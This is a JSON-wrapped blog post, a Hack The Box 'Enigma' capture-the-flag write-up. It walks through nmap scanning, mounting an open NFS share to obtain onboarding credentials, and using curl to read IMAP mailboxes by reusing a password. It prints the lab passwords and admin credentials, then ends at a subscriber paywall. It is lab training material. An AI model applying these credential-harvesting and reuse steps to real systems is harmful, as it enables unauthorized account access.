{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreicmnarqwfm2g7dvpszgpgu5gjmpryg5onobedj4iidmeacp4r3epe",
    "uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mpdj4gal3es2"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreid7zrijkyt7byz6tdubyqavebqp4jvprhzqt4a4ngdfloosgcemoe"
    },
    "mimeType": "image/jpeg",
    "size": 87547
  },
  "description": "Placeholders used\n\n\n\n\n\n\nToken\nMeaning\n\n\n\n\n$TARGET\nthe target machine's IP\n\n\n$ATTACKER\nyour VPN (tun0) IP\n\n\n$LPORT\nyour reverse-shell listener port (e.g. 9001)\n\n\n[REDACTED]\nvalue intentionally removed\n\n\n\n\n\n\n\n0. SETUP & A NETWORK GOTCHA\n\nAdd the vhosts (discovered along the way: enigma.htb, mail001.enigma.htb,\nsupport_001.enigma.htb):\n\necho \"$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb\" | sudo tee -a /etc/hosts\n\n\nThis is the classic HTB tun0 MTU black-hole: large packets (TLS Cl...",
  "path": "/hack-the-box-htb-enigma-writeup-easy-weekly-june-27th-2026/",
  "publishedAt": "2026-06-28T08:02:22.000Z",
  "site": "https://1337sheets.com",
  "tags": [
    "Subscribe now"
  ],
  "textContent": "**Placeholders used**\n\nToken | Meaning\n---|---\n`$TARGET` | the target machine's IP\n`$ATTACKER` | your VPN (tun0) IP\n`$LPORT` | your reverse-shell listener port (e.g. 9001)\n`[REDACTED]` | value intentionally removed\n\n* * *\n\n## 0. Setup & a network gotcha\n\nAdd the vhosts (discovered along the way: `enigma.htb`, `mail001.enigma.htb`,\n`support_001.enigma.htb`):\n\n\n    echo \"$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb\" | sudo tee -a /etc/hosts\n\n\nThis is the classic HTB tun0 **MTU black-hole** : large packets (TLS ClientHello\n\n  * certificate) get dropped on the VPN. Fix by lowering the interface MTU:\n\n\n\n\n    sudo ip link set dev tun0 mtu 1300\n\n\nAfter this, everything worked. If IMAP/HTTPS to a box hangs while plain TCP\nconnects, suspect MTU first.\n\n* * *\n\n## 1. Enumeration\n\n\n    nmap -p- --min-rate 2000 -sV -sC $TARGET\n\n\nA mail-server-themed host:\n\n\n    22/tcp    ssh        (publickey only)\n    80/tcp    http       nginx (Ubuntu)\n    110/tcp   pop3\n    111/tcp   rpcbind\n    143/tcp   imap\n    993/tcp   imaps\n    995/tcp   pop3s\n    2049/tcp  nfs\n    + high ports → mountd / nlockmgr / status (NFS machinery)\n\n\nReading the surface: a full **mail stack** (POP3/IMAP + TLS), **NFS/rpcbind**\n(always worth an anonymous check), and a web server. No SMTP exposed — mail is\ndelivered locally only.\n\n* * *\n\n## 2. NFS → onboarding credentials\n\n\n    showmount -e $TARGET\n    # Export list for $TARGET:\n    # /srv/nfs/onboarding *\n\n\nThe `*` means it is exported to **everyone with no authentication**. Mount and\nread it:\n\n\n    sudo mkdir -p /mnt/onboarding\n    sudo mount -t nfs -o vers=3,nolock $TARGET:/srv/nfs/onboarding /mnt/onboarding\n    ls -la /mnt/onboarding\n    # -rw-r--r-- 1 root root 1751 ... New_Employee_Access.pdf\n\n\nThe PDF is an IT \"New Employee System Access\" sheet:\n\n\n    Employee : Kevin Mitchell\n    Webmail  : http://mail001.enigma.htb\n    Username : kevin\n    Password : Enigma2024!\n\n\n* * *\n\n## 3. Webmail + password reuse → OpenSTAManager creds\n\nThe webmail (`mail001.enigma.htb`) is **Roundcube 1.6.16**. The version is leaked\nin the login page's inline JS (`rcversion: 10616` = `version2int(\"1.6.16\")`).\n1.6.16 is the _patched_ release — it fixes the whole 2026 Roundcube CVE batch —\nso chasing a Roundcube RCE is a **deliberate dead end**. The credentials are\nreal, though, and the onboarding password is a corporate default that is\n**reused**.\n\nDrive IMAP directly with `curl` (no web UI needed). First log in as **kevin** and\nlist his folders:\n\n\n    curl -s --url \"imaps://$TARGET/\" --user \"kevin:Enigma2024!\" -k\n    # * LIST (...) \"/\" Sent / Trash / INBOX\n\n\n**Where`sarah` comes from:** read kevin's inbox. His only message is a welcome\nemail **from`sarah@enigma.htb`** (\"I'm Sarah from the Accounts department…\"),\nwhich is how we learn a second user/mailbox exists:\n\n\n    curl -s --url \"imaps://$TARGET/INBOX/;MAILINDEX=1\" --user \"kevin:Enigma2024!\" -k\n\n\n\n    From    : sarah@enigma.htb\n    Subject : Welcome to Enigma Corp, Kevin!\n    ...\n    I'm Sarah from the Accounts department. I'll be your point of contact ...\n\n\nNow test the reused onboarding password against **sarah's** mailbox — it works:\n\n\n    curl -s --url \"imaps://$TARGET/\" --user \"sarah:Enigma2024!\" -k\n    # * LIST (...) \"/\" Trash / INBOX        ← auth succeeds → password reuse confirmed\n\n\nRead sarah's inbox:\n\n\n    curl -s --url \"imaps://$TARGET/INBOX/;MAILINDEX=1\" --user \"sarah:Enigma2024!\" -k\n\n\n\n    Subject : Re: OpenSTAManager Access Request\n    URL      : http://support_001.enigma.htb\n    Username : admin\n    Password : Ne3s4rtars78s\n\n\nA **third vhost** and admin credentials for **OpenSTAManager** (an open-source\nmanagement / e-invoicing app). SSH is publickey-only, so reuse helps only on the\nmail service.\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
  "title": "Hack The Box - HTB Enigma Writeup - Easy - Weekly - June 27th, 2026",
  "updatedAt": "2026-06-28T08:02:23.099Z"
}